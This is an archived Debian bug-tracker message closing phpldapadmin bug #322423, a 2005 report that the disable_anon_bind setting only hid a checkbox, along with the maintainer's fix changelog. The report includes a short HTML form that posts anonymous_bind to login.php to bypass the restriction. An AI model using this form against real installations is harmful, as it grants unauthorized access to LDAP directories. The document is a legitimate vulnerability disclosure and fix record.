Bug#322423: marked as done ($servers[$i]['disable_anon_bind'] = true doesn't prevent anonymous to access ldap directory)

Debian Bug Tracking System Wed, 10 Aug 2005 10:49:11 -0700

Your message dated Wed, 10 Aug 2005 10:32:17 -0700
with message-id <[EMAIL PROTECTED]>
and subject line Bug#322423: fixed in phpldapadmin 0.9.6c-5
has caused the attached Bug report to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 10 Aug 2005 15:35:26 +0000
>From [EMAIL PROTECTED] Wed Aug 10 08:35:26 2005
Return-path: <[EMAIL PROTECTED]>
Received: from eol.lvk.cs.msu.su [158.250.17.73] 
        by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
        id 1E2sc1-0001oL-00; Wed, 10 Aug 2005 08:35:26 -0700
Received: by eol.lvk.cs.msu.su (Postfix, from userid 1000)
        id 1D7A6125C; Wed, 10 Aug 2005 19:35:23 +0400 (MSD)
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Alexander Gerasiov <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: $servers[$i]['disable_anon_bind'] = true doesn't prevent anonymous to 
access
 ldap directory
X-Mailer: reportbug 3.8
Date: Wed, 10 Aug 2005 19:35:23 +0400
Message-Id: <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
        (1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-5.5 required=4.0 tests=BAYES_00,HAS_PACKAGE,
        HTML_10_20,HTML_MESSAGE autolearn=no 
        version=2.60-bugs.debian.org_2005_01_02

Package: phpldapadmin
Version: 0.9.6c-4
Severity: critical
Tags: security

Even if you deny anonymous login with disable_anon_bind anyone could
access your LDAP server.

As I can see this option only hide checkbox from the input page, but
anyone can create workaround hack:

==========example form to log into eol.lvk.cs.msu.su========
<html><body>

<form action="https://eol.lvk.cs.msu.su/phpldapadmin/login.php";
method="post" name="login_form">
<input type="hidden" name="server_id" value="0" />
<input type="checkbox" name="anonymous_bind" checked />
<input type="submit" name="submit" value="login" />
</form>

</body></html>
=============================================================

I think, that version in sarge is also vulnerable to this trick.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (620, 'testing'), (600, 'unstable'), (550, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-686
Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R)

Versions of packages phpldapadmin depends on:
ii  apache [httpd]               1.3.33-6    versatile, high-performance HTTP s
ii  debconf                      1.4.30.13   Debian configuration management sy
ii  php4                         4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-cgi                     4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-ldap                    4:4.3.10-15 LDAP module for php4

-- debconf information:
  phpldapadmin/ldap-bindpw: secret
  phpldapadmin/ldap-tls: false
  phpldapadmin/ldap-binddn: cn=admin,dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
* phpldapadmin/reconfigure-webserver: apache
* phpldapadmin/restart-webserver: true
  phpldapadmin/ldap-basedn: dc=eol,dc=lvk,dc=cs,dc=msu,dc=su
  phpldapadmin/ldap-server: localhost
* phpldapadmin/ldap-authtype: cookie

---------------------------------------
Received: (at 322423-close) by bugs.debian.org; 10 Aug 2005 17:41:36 +0000
>From [EMAIL PROTECTED] Wed Aug 10 10:41:36 2005
Return-path: <[EMAIL PROTECTED]>
Received: from katie by spohr.debian.org with local (Exim 3.36 1 (Debian))
        id 1E2uR7-0003uq-00; Wed, 10 Aug 2005 10:32:17 -0700
From: Fabio Tranchitella <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#322423: fixed in phpldapadmin 0.9.6c-5
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Wed, 10 Aug 2005 10:32:17 -0700
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
        (1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
        autolearn=no version=2.60-bugs.debian.org_2005_01_02

Source: phpldapadmin
Source-Version: 0.9.6c-5

We believe that the bug you reported is fixed in the latest version of
phpldapadmin, which is due to be installed in the Debian FTP archive:

phpldapadmin_0.9.6c-5.diff.gz
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.diff.gz
phpldapadmin_0.9.6c-5.dsc
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5.dsc
phpldapadmin_0.9.6c-5_all.deb
  to pool/main/p/phpldapadmin/phpldapadmin_0.9.6c-5_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Fabio Tranchitella <[EMAIL PROTECTED]> (supplier of updated phpldapadmin 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Wed, 10 Aug 2005 17:14:01 +0000
Source: phpldapadmin
Binary: phpldapadmin
Architecture: source all
Version: 0.9.6c-5
Distribution: unstable
Urgency: high
Maintainer: Fabio Tranchitella <[EMAIL PROTECTED]>
Changed-By: Fabio Tranchitella <[EMAIL PROTECTED]>
Description: 
 phpldapadmin - web based interface for administering LDAP servers
Closes: 322423
Changes: 
 phpldapadmin (0.9.6c-5) unstable; urgency=high
 .
   * debian/control: added build-deps on dpatch.
   * debian/patches/login.dpatch: really block anonymous login when disabled
     by config files. (Closes: #322423)
Files: 
 59bd6b27ce9498c9c4408a36dcdbb388 617 admin extra phpldapadmin_0.9.6c-5.dsc
 a4e84ec8e644aa65d2b735f87ee734d6 13449 admin extra 
phpldapadmin_0.9.6c-5.diff.gz
 20d8733a521b99277a526caf61bc9c57 714834 admin extra 
phpldapadmin_0.9.6c-5_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFC+jYJK/juK3+WFWQRAhowAKCgt4oKUWxK0vC4+fpgtAjtZY0NnwCeP+zs
uXNUDOVdCNcBowv8aWp1ekM=
=ooMS
-----END PGP SIGNATURE-----


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#322423: marked as done ($servers[$i]['disable_anon_bind'] = true doesn't prevent anonymous to access ldap directory)

Reply via email to